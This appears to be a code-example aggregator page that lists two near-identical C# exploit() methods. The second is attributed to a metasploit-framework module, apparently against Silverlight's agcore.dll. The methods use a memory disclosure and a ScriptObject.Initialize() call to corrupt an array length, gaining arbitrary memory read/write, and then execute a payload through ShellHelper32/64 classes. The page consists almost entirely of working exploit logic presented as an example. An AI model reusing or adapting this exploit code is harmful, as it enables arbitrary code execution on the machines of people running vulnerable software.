C# (CSharp) ShellHelper32 Examples

Example #1

        void exploit()
        {
            try
            {
                LogAdd("------------ START ------------");
                // prepare pointer for ScriptObject.Initialize()
                ulong h = MemoryDiscl();
                LogAdd("handle = " + Hex(h));
                if (h == 0)
                {
                    throw new Exception("Something is wrong with the memory disclosure");
                }

                // save old length
                int oldLen = buf.Length;
                LogAdd("buf.Length = " + Hex(oldLen));

                // call ScriptObject.Initialize() and cause the buf.Length corruption
                MyObject mo = new MyObject();
                mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h)

                // check results
                int len = buf.Length;
                LogAdd("buf.Length = " + Hex(len));
                if (len == oldLen)
                {
                    throw new Exception("Something is wrong with buf.Length");
                }

                // ok, now we have an uint[] array with Length > 0x40000000, so we can read/write arbitrary memory addresses on x32,
                // but this is not allways enough for x64. So for 64-bit we have to use different technique to gain the true "god mode".
                ShellHelper32 sh;
                if (is64)
                {
                    sh = new ShellHelper64();
                    sh.SetPayload(payload);
                }
                else
                {
                    sh = new ShellHelper32();
                    sh.SetPayload(payload);
                }

                // execute payload
                sh.Exec(oldLen);

                LogAdd("------------  END  ------------");
            }
            catch (Exception ex)
            {
                LogAdd("Error: " + ex.ToString());
            }
        }

Example #2

File: MainPage.xaml.cs Project: 007bon/metasploit-framework

        void exploit()
        {
            try
            {
                LogAdd("------------ START ------------");
                // prepare pointer for ScriptObject.Initialize()
                ulong h = MemoryDiscl();
                LogAdd("handle = " + Hex(h));
                if (h == 0) throw new Exception("Something is wrong with the memory disclosure");

                // save old length
                int oldLen = buf.Length;
                LogAdd("buf.Length = " + Hex(oldLen));

                // call ScriptObject.Initialize() and cause the buf.Length corruption 
                MyObject mo = new MyObject();
                mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h)

                // check results
                int len = buf.Length;
                LogAdd("buf.Length = " + Hex(len));
                if (len == oldLen) throw new Exception("Something is wrong with buf.Length");

                // ok, now we have an uint[] array with Length > 0x40000000, so we can read/write arbitrary memory addresses on x32,
                // but this is not allways enough for x64. So for 64-bit we have to use different technique to gain the true "god mode".
                ShellHelper32 sh;
                if (is64)
                {
                    sh = new ShellHelper64();
                    sh.SetPayload(payload);
                }
                else
                {
                    sh = new ShellHelper32();
                    sh.SetPayload(payload);
                }

                // execute payload
                sh.Exec(oldLen);

                LogAdd("------------  END  ------------");
            }
            catch (Exception ex)
            {
                LogAdd("Error: " + ex.ToString());
            }
        }